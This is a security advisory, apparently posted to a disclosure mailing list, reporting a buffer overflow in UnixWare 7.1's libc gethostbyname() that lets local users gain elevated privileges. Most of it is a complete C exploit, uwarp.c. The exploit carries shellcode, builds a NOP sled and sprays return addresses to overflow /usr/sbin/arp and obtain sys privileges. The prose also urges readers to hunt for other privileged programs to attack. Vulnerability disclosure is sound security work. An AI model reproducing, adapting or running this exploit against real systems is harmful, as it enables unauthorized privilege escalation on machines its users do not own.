Greetings,

OVERVIEW
A serious bug exists in UnixWare 7.1's libc.  A buffer overflow in
gethostbyname() will allow any user to obtain elevated privileges.

BACKGROUND
Is this the same gethostbyname() overflow which was present in ancient 
versions of non-unixware libc's way back when?  I can't say for sure, but
given SCO's record of fixing known holes (remember the OpenServer 5
Xtlib overflows, still present four years after they were known?), I 
wouldn't doubt it.

DETAILS
Any program which uses gethostbyname() with user-defined input is
vulnerable to a buffer overflow attack.  These overflows come with
various eases of exploitability.  My demonstration program happened to
be "arp", but any program calling this function will do.  When exploiting
the dozens of programs vulnerable to this hole, don't forget to check
your /etc/security/tcb/privs file for other non-suid programs which may
allow you to elevate your privileges as well. See my uidadmin advisory
for more info on UW7's privilege system.

EXPLOIT
--- uwarp.c ---
/**
 ** UnixWare 7.1 arp exploit yields gid of sys 
 ** Demonstrates overflow in uw71's gethostbyname()
 ** use offsets of +-100
 ** Brock Tellier btellier@usa.net
 **       
 **/ 


#include <stdlib.h>
#include <stdio.h>

char scoshell[]= 
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/tmp/ui\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";

                       
#define LEN 3500
#define NOP 0x90

/* cc != gcc, use hard-coded addresses usually within 0x8045xxxx-0x8048xxxx
unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}
*/

int main(int argc, char *argv[]) {

long int offset=0;

int i;
int buflen = LEN;
long int addr;
char buf[LEN];
 
 if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
        exit(0); 
 }
 else if (argc == 2){
   offset=atoi(argv[1]);
   
 }
 else if (argc == 3) {
  offset=atoi(argv[1]);
  buflen=atoi(argv[2]); 
   
 }
 else {
   offset=100;
   buflen=3000;

 }
 

addr=0x8046b75 + offset;

fprintf(stderr, "\nUnixWare 7.1 arp exploit yields uid of sys\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),scoshell,strlen(scoshell));
for(i=((buflen/2) + strlen(scoshell))+2;i<buflen-4;i+=4)
        *(int *)&buf[i]=addr;

execl("/usr/sbin/arp", "arp", buf,
NULL);

exit(0);
}

------
Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA
btellier@usa.net